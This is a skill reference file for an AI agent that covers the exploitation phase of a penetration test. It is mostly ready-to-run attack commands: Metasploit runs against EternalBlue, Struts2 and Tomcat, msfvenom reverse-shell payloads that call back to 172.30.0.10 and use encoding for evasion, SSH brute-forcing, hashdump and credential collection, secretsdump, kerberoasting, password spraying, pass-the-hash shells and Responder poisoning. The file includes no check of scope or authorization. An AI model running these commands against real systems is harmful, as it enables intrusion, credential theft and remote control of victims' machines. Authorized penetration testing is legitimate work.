| name | pentest-exploit |
| description | Exploitation tool reference covering Metasploit Framework (msfconsole, msfvenom), searchsploit (ExploitDB), and on-demand tools (crackmapexec/netexec, impacket, evil-winrm, responder, BeEF, SET). Use during the exploitation phase of a penetration test after vulnerabilities have been identified.
|
| version | 2.0.0 |
| triggers | ["exploit","exploitation","metasploit","msfconsole","msfvenom","searchsploit","reverse shell","payload","CVE","remote code execution","RCE"] |
Exploitation — Tool Reference
Metasploit Framework
Non-Interactive Patterns (for AI agent)
msfconsole -q -x "search type:exploit <keyword>; exit"
msfconsole -q -x "search cve:2024-XXXXX; exit"
msfconsole -q -x "search type:auxiliary <keyword>; exit"
msfconsole -q -x "info <module_path>; exit"
Standard Exploit Workflow
msfconsole -q -x "
use <exploit_module>;
set RHOSTS <target>;
set RPORT <port>;
set LHOST 172.30.0.10;
set LPORT 4444;
show options;
exploit -z;
sessions -l;
exit
"
Common Exploits
msfconsole -q -x "
use exploit/windows/smb/ms17_010_eternalblue;
set RHOSTS <target>;
set LHOST 172.30.0.10;
exploit -z; exit
"
msfconsole -q -x "
use exploit/multi/http/struts2_content_type_ognl;
set RHOSTS <target>;
set RPORT 8080;
set TARGETURI /;
exploit -z; exit
"
msfconsole -q -x "
use exploit/multi/http/tomcat_mgr_upload;
set RHOSTS <target>;
set RPORT 8080;
set HttpUsername admin;
set HttpPassword admin;
exploit -z; exit
"
Auxiliary Scanners
msfconsole -q -x "use auxiliary/scanner/smb/smb_version; set RHOSTS <target>; run; exit"
msfconsole -q -x "use auxiliary/scanner/ssh/ssh_login; set RHOSTS <target>; set USERNAME root; set PASS_FILE /usr/share/wordlists/rockyou.txt; set STOP_ON_SUCCESS true; run; exit"
msfconsole -q -x "use auxiliary/scanner/http/dir_scanner; set RHOSTS <target>; run; exit"
msfconsole -q -x "use auxiliary/scanner/ftp/anonymous; set RHOSTS <target>; run; exit"
msfconsole -q -x "use auxiliary/scanner/vnc/vnc_none_auth; set RHOSTS <target>; run; exit"
Msfvenom — Payload Generation
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.30.0.10 LPORT=4444 -f exe > shell.exe
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.30.0.10 LPORT=4444 -f elf > shell.elf
msfvenom -p php/meterpreter_reverse_tcp LHOST=172.30.0.10 LPORT=4444 -f raw > shell.php
msfvenom -p python/meterpreter/reverse_tcp LHOST=172.30.0.10 LPORT=4444 -f raw > shell.py
msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.30.0.10 LPORT=4444 -f war > shell.war
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.0.10 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > encoded.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.0.10 LPORT=4444 -b '\x00\x0a\x0d' -f exe > clean.exe
msfvenom -l payloads | grep reverse_tcp
Post-Exploitation (from Meterpreter)
msfconsole -q -x "sessions -i <id>; getuid; sysinfo; exit"
msfconsole -q -x "sessions -i <id>; run post/multi/recon/local_exploit_suggester; exit"
msfconsole -q -x "sessions -i <id>; run post/windows/gather/hashdump; exit"
msfconsole -q -x "sessions -i <id>; run post/multi/gather/ping_sweep RHOSTS=<subnet>/24; exit"
msfconsole -q -x "sessions -i <id>; run post/windows/gather/credentials/credential_collector; exit"
Searchsploit — ExploitDB Search
searchsploit apache 2.4
searchsploit openssh 8.2
searchsploit --cve 2024-12345
searchsploit -m 12345
searchsploit -x 12345
searchsploit --json apache > /tmp/results.json
searchsploit -u
searchsploit apache --exclude="php"
searchsploit -t "Apache 2.4"
On-Demand Exploitation Tools
CrackMapExec/NetExec — AD/Windows Swiss Army Knife
crackmapexec smb <target> -u '' -p ''
crackmapexec smb <target> -u admin -p 'password' --shares
crackmapexec smb <target> -u admin -H '<ntlm_hash>' --shares
crackmapexec smb <target> -u admin -p 'password' --users
crackmapexec smb <target> -u admin -p 'password' -x 'whoami'
crackmapexec smb <target> -u users.txt -p 'Password123!' --continue-on-success
Impacket — Windows Protocol Toolkit
impacket-psexec <domain>/<user>:<password>@<target>
impacket-wmiexec <domain>/<user>:<password>@<target>
impacket-secretsdump <domain>/<user>:<password>@<target>
impacket-smbserver share /tmp -smb2support
impacket-GetNPUsers <domain>/ -usersfile users.txt -format hashcat -outputfile asrep.txt -dc-ip <dc>
impacket-GetUserSPNs <domain>/<user>:<password> -dc-ip <dc> -outputfile kerberoast.txt
Evil-WinRM — Windows Remote Shell
evil-winrm -i <target> -u admin -p 'password'
evil-winrm -i <target> -u admin -H '<ntlm_hash>'
Responder — LLMNR/NBT-NS Poisoner
responder -I eth0
responder -I eth0 -wF
responder -I eth0 -A
Tool Selection Guide
| Situation | Best Tool |
|---|
| Known CVE → exploit | searchsploit <cve> then msfconsole |
| Web app exploit | msfconsole or manual with curl |
| Windows/AD target | crackmapexec → impacket → evil-winrm |
| Generate payload | msfvenom -p <payload> -f <format> |
| Capture NTLM hashes | responder -I eth0 |
| Remote Windows shell | evil-winrm or impacket-psexec |
| Post-exploit from Meterpreter | post/multi/recon/local_exploit_suggester |